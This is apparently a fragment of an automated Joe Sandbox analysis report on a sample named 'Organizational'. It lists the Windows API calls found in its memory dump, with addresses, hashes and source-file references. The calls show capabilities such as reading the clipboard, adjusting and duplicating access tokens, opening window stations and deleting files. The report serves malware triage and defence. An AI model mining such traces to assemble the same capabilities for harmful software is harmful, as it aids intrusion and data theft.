                                                    • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                    • Instruction Fuzzy Hash: 59F052B6900208BBDF108F84DC00DEABB69EB89720F004598FA045A210D232EA61ABA0
                                                    APIs
                                                    • FreeLibrary.KERNEL32(?,?,?,00F027AF,?,00000001), ref: 00F04A63
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 18976368c5092bc0507677532f350141054a1e31ebca050135fe9fc43c84bf58
                                                    • Instruction ID: e39e262403306dde2b75ab85c4fd5a8378355b0b1aba67f3f14af4b918a7ef2c
                                                    • Opcode Fuzzy Hash: 18976368c5092bc0507677532f350141054a1e31ebca050135fe9fc43c84bf58
                                                    • Instruction Fuzzy Hash: DCF08CB2640701CFCB348F24D484816BBF0AF84329310892EE2D683650C735A984FB04
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __fread_nolock
                                                    • String ID:
                                                    • API String ID: 2638373210-0
                                                    • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                    • Instruction ID: 4cdf51e513a056ff94efd697b60c725f9cd39c1b57361dd8a5bd6047572c5355
                                                    • Opcode Fuzzy Hash: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                    • Instruction Fuzzy Hash: D2F0587240020DFFDF04DF80C941EAABB79FB04324F208189FD198A252D336EA61EB90
                                                    APIs
                                                    • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00F109E4
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: LongNamePath_memmove
                                                    • String ID:
                                                    • API String ID: 2514874351-0
                                                    • Opcode ID: 7cefa9c0bb71acdc864ed8f030be8f9d609d39e2e522f8456cec8abce90b3dbe
                                                    • Instruction ID: 7ca023a5bdfb18f6fad8d9be14c6a4d238b6715c7d381c4889382a8c3185f8e0
                                                    • Opcode Fuzzy Hash: 7cefa9c0bb71acdc864ed8f030be8f9d609d39e2e522f8456cec8abce90b3dbe
                                                    • Instruction Fuzzy Hash: 1EE0863290012857C72196989C05FEA77EDEB89790F0441B6FC08D7254D9649D859691
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00F54D31
                                                      • Part of subcall function 00F01821: _memmove.LIBCMT ref: 00F0185B
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FolderPath_memmove
                                                    • String ID:
                                                    • API String ID: 3334745507-0
                                                    • Opcode ID: c531aa9ef501e09df578d417ee7c1d7ddff870d480766c2813926756ff2c824b
                                                    • Instruction ID: 5ceed74525c67dbab03002c964fc446734a0ff2b01082fe734f494ac9e7ad75a
                                                    • Opcode Fuzzy Hash: c531aa9ef501e09df578d417ee7c1d7ddff870d480766c2813926756ff2c824b
                                                    • Instruction Fuzzy Hash: E3D05EB190032C2BDB60E6A49C0DDF77BACE744220F0006A1BC5CD3142ED249D4586E0
                                                    APIs
                                                      • Part of subcall function 00F5384C: SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000001,00000000,00000000,00F53959,00000000,00000000,?,00F405DB,00FA8070,00000002,?,?), ref: 00F538CA
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,?,00F405DB,00FA8070,00000002,?,?,?,00000000), ref: 00F53967
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: File$PointerWrite
                                                    • String ID:
                                                    • API String ID: 539440098-0
                                                    • Opcode ID: 1fb73c2231cd377ba9472bf4dafa2877951cd6c5f7ab3b0720cea0f7338763c2
                                                    • Instruction ID: acba2e56a2767852dfb3959f809d60b3b9f58318f01d750a145eeb3915a833a4
                                                    • Opcode Fuzzy Hash: 1fb73c2231cd377ba9472bf4dafa2877951cd6c5f7ab3b0720cea0f7338763c2
                                                    • Instruction Fuzzy Hash: 66E04F36400208BBD720AF94DC05ADAB7BCEB04361F00455AFD4091111DBB29E14AB90
                                                    APIs
                                                    • CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F53E7D,?,?,?), ref: 00F53F0D
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CopyFile
                                                    • String ID:
                                                    • API String ID: 1304948518-0
                                                    • Opcode ID: 23454085e1d2a7bb3ad66cab5c65972741c8b4fd50c9ca8c157505be02049cd9
                                                    • Instruction ID: 35ad37f255996fae9da06bf3860f5d64744b1e85445bf470abdb1c72087a126e
                                                    • Opcode Fuzzy Hash: 23454085e1d2a7bb3ad66cab5c65972741c8b4fd50c9ca8c157505be02049cd9
                                                    • Instruction Fuzzy Hash: 3BD0A7315E020CBBEF50DFA0CC06FB8B7ACEB01706F1002A4B504D90E0DAB269189795
                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00F406E6,00000000,00000000,00000000), ref: 00F042BF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID:
                                                    • API String ID: 973152223-0
                                                    • Opcode ID: e8bf1c771d4caedb7632a8906a0d7b3805daddcfc29d36e1e4ffec36ddea4f69
                                                    • Instruction ID: d810a4108206d72b207052d182d80851476628ee799e175c3375a641cdbc951d
                                                    • Opcode Fuzzy Hash: e8bf1c771d4caedb7632a8906a0d7b3805daddcfc29d36e1e4ffec36ddea4f69
                                                    • Instruction Fuzzy Hash: 59D0C77464020CBFE710CB80DC46FA9777CE705710F500194FD0466290D6B27D549795
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,00F53BFE), ref: 00F54FED
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: b85523d086a90e09ad20e0fe4af520a0c7d516aecbe28c13e67900748798bf09
                                                    • Instruction ID: 1e4a7fbad85acd242d35c9474a56ea41d6183e9b4cccb4b575734af0f37789ee
                                                    • Opcode Fuzzy Hash: b85523d086a90e09ad20e0fe4af520a0c7d516aecbe28c13e67900748798bf09
                                                    • Instruction Fuzzy Hash: A0B09234400A80769D681E3C194C4A9338159423BE7D81B81E978864E59639A88FB760
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: __wfsopen
                                                    • String ID:
                                                    • API String ID: 197181222-0
                                                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction ID: affe16d52ca62683a70e950ed84eaa798cb443941b029d7f10983d6f3a61d3da
                                                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                    • Instruction Fuzzy Hash: 8AB0927644020CB7CE012A82EC13A993B299B84A68F408020FB0C1C162A677A6A0A689
                                                    APIs
                                                    • GetLastError.KERNEL32(00000002,00000000), ref: 00F5D842
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: f3c5e359e0533a5df9a2e7505b3d0cbd4390031e701433ce72bb7d9e552e6cf3
                                                    • Instruction ID: 928b65a3c67ef6a260591b01a2b1ea45966f0790ecb133b7aa96b6542d6f91d6
                                                    • Opcode Fuzzy Hash: f3c5e359e0533a5df9a2e7505b3d0cbd4390031e701433ce72bb7d9e552e6cf3
                                                    • Instruction Fuzzy Hash: 937192706053018FC724EF64D891A6EB7E0BF88355F04462CFA96972A2DB34ED49EB52
                                                    APIs
                                                      • Part of subcall function 00F54005: FindFirstFileW.KERNEL32(?,?), ref: 00F5407C
                                                      • Part of subcall function 00F54005: DeleteFileW.KERNEL32(?,?,?,?), ref: 00F540CC
                                                      • Part of subcall function 00F54005: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F540DD
                                                      • Part of subcall function 00F54005: FindClose.KERNEL32(00000000), ref: 00F540F4
                                                    • GetLastError.KERNEL32 ref: 00F5C292
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                    • String ID:
                                                    • API String ID: 2191629493-0
                                                    • Opcode ID: 0d68d892dbe2e93e8b3c3764b46744038ce16b2b71483840b18bc7ef11d5d08d
                                                    • Instruction ID: 1ed9b6529c868118a94725ee78e891e80e0f49b747bfde34bfd0bf359d3b4382
                                                    • Opcode Fuzzy Hash: 0d68d892dbe2e93e8b3c3764b46744038ce16b2b71483840b18bc7ef11d5d08d
                                                    • Instruction Fuzzy Hash: 57F0A0323102148FCB10EF59D840F6AB7E5AF88320F05C019FA0A9B392CB74BC05DB94
                                                    APIs
                                                    • CloseHandle.KERNEL32(?,?,00000000,00F32F8B), ref: 00F042EF
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: fd47a72ca1896635f3405faf46cdd73c5cfec1b359eb82a34d328910a293c8a8
                                                    • Instruction ID: c5bb18dc3badd2b47bf965e0a5b9d1a34925f0c819709cccae1c7dcb53cbd2b4
                                                    • Opcode Fuzzy Hash: fd47a72ca1896635f3405faf46cdd73c5cfec1b359eb82a34d328910a293c8a8
                                                    • Instruction Fuzzy Hash: 2DE0BFB5500701CFC3314F1AD804451F7F4FFD13713214A2EE1E6925A0D7B06499EB50
                                                    APIs
                                                      • Part of subcall function 00EF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00EF29F3
                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00F7D208
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F7D249
                                                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F7D28E
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F7D2B8
                                                    • SendMessageW.USER32 ref: 00F7D2E1
                                                    • _wcsncpy.LIBCMT ref: 00F7D359
                                                    • GetKeyState.USER32(00000011), ref: 00F7D37A
                                                    • GetKeyState.USER32(00000009), ref: 00F7D387
                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F7D39D
                                                    • GetKeyState.USER32(00000010), ref: 00F7D3A7
                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F7D3D0
                                                    • SendMessageW.USER32 ref: 00F7D3F7
                                                    • SendMessageW.USER32(?,00001030,?,00F7B9BA), ref: 00F7D4FD
                                                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00F7D513
                                                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00F7D526
                                                    • SetCapture.USER32(?), ref: 00F7D52F
                                                    • ClientToScreen.USER32(?,?), ref: 00F7D594
                                                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00F7D5A1
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F7D5BB
                                                    • ReleaseCapture.USER32 ref: 00F7D5C6
                                                    • GetCursorPos.USER32(?), ref: 00F7D600
                                                    • ScreenToClient.USER32(?,?), ref: 00F7D60D
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F7D669
                                                    • SendMessageW.USER32 ref: 00F7D697
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F7D6D4
                                                    • SendMessageW.USER32 ref: 00F7D703
                                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F7D724
                                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F7D733
                                                    • GetCursorPos.USER32(?), ref: 00F7D753
                                                    • ScreenToClient.USER32(?,?), ref: 00F7D760
                                                    • GetParent.USER32(?), ref: 00F7D780
                                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F7D7E9
                                                    • SendMessageW.USER32 ref: 00F7D81A
                                                    • ClientToScreen.USER32(?,?), ref: 00F7D878
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F7D8A8
                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F7D8D2
                                                    • SendMessageW.USER32 ref: 00F7D8F5
                                                    • ClientToScreen.USER32(?,?), ref: 00F7D947
                                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F7D97B
                                                      • Part of subcall function 00EF29AB: GetWindowLongW.USER32(?,000000EB), ref: 00EF29BC
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F7DA17
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                    • String ID: @GUI_DRAGID$F
                                                    • API String ID: 3977979337-4164748364
                                                    • Opcode ID: 14f47706f492804ee96336561c2fd4f64e80c39b0352761dacbb8fb2e31ce196
                                                    • Instruction ID: d6fdb238051cd096cad6814fac9cb13fe9142c318a186f2f198849cb5792d079
                                                    • Opcode Fuzzy Hash: 14f47706f492804ee96336561c2fd4f64e80c39b0352761dacbb8fb2e31ce196
                                                    • Instruction Fuzzy Hash: 97429E306053459FD724DF24C884BAABBF5FF88320F94461AF699872A1CBB1D854EF52
                                                    APIs
                                                      • Part of subcall function 00F49399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F493E3
                                                      • Part of subcall function 00F49399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F49410
                                                      • Part of subcall function 00F49399: GetLastError.KERNEL32 ref: 00F4941D
                                                    • _memset.LIBCMT ref: 00F48F71
                                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00F48FC3
                                                    • CloseHandle.KERNEL32(?), ref: 00F48FD4
                                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F48FEB
                                                    • GetProcessWindowStation.USER32 ref: 00F49004
                                                    • SetProcessWindowStation.USER32(00000000), ref: 00F4900E
                                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F49028
                                                      • Part of subcall function 00F48DE9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F48F27), ref: 00F48DFE
                                                      • Part of subcall function 00F48DE9: CloseHandle.KERNEL32(?,?,00F48F27), ref: 00F48E10
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                    • String ID: $default$winsta0
                                                    • API String ID: 2063423040-1027155976
                                                    • Opcode ID: afe9e0435f90ced5ddaa41537f5cf6705fa46ce913d0fffa941fcc09c55b219f
                                                    • Instruction ID: 8df0a57800d8b9b6475ec57f9e6c9804eb6ba684ed18748506a9cf1661e6550a
                                                    • Opcode Fuzzy Hash: afe9e0435f90ced5ddaa41537f5cf6705fa46ce913d0fffa941fcc09c55b219f
                                                    • Instruction Fuzzy Hash: C88148B1E0420DBFEF119FA4CC49AEE7B79AF44364F044119FD10A6261DB758E19EB20
                                                    APIs
                                                    • OpenClipboard.USER32(00F80980), ref: 00F6465C
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F6466A
                                                    • GetClipboardData.USER32(0000000D), ref: 00F64672
                                                    • CloseClipboard.USER32 ref: 00F6467E
                                                    • GlobalLock.KERNEL32(00000000), ref: 00F6469A
                                                    • CloseClipboard.USER32 ref: 00F646A4
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F646B9
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00F646C6
                                                    • GetClipboardData.USER32(00000001), ref: 00F646CE
                                                    • GlobalLock.KERNEL32(00000000), ref: 00F646DB
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00F6470F
                                                    • CloseClipboard.USER32 ref: 00F6481F
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.4002484163.0000000000EF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EF0000, based on PE: true
                                                    • Associated: 0000000B.00000002.4002458922.0000000000EF0000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000F80000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002597016.0000000000FA6000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002665793.0000000000FB0000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_ef0000_Organizational.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                    • String ID:
                                                    • API String ID: 3222323430-0
                                                    • Opcode ID: 2a774dcc0fd6088b799f47c3d77f20bd7f4e45611db41a618601e192444439a8
                                                    • Instruction ID: 02fba72946602c5b6b5f0e7f069ba994bdc3416b1455663170797dfb679b49f2
                                                    • Opcode Fuzzy Hash: 2a774dcc0fd6088b799f47c3d77f20bd7f4e45611db41a618601e192444439a8
                                                    • Instruction Fuzzy Hash: 1E51A372244205ABD340FF60DC89FBE77A8AF84B10F404529F546D31E2EF71E908AB62
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00F5CDD0
                                                    • FindClose.KERNEL32(00000000), ref: 00F5CE24
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F5CE49
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F5CE60
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F5CE87
                                                    • __swprintf.LIBCMT ref: 00F5CED3
                                                    • __swprintf.LIBCMT ref: 00F5CF16
                                                      • Part of subcall function 00F01A36: _memmove.LIBCMT ref: 00F01A77
                                                    • __swprintf.LIBCMT ref: 00F5CF6A
                                                      • Part of subcall function 00F138C8: __woutput_l.LIBCMT ref: 00F13921
                                                    • __swprintf.LIBCMT ref: 00F5CFB8
                                                      • Part of subcall function 00F138C8: __flsbuf.LIBCMT ref: 00F13943
                                                      • Part of subcall function 00F138C8: __flsbuf.LIBCMT ref: 00F1395B
                                                    • __swprintf.LIBCMT ref: 00F5D007
                                                    • __swprintf.LIBCMT ref: 00F5D056
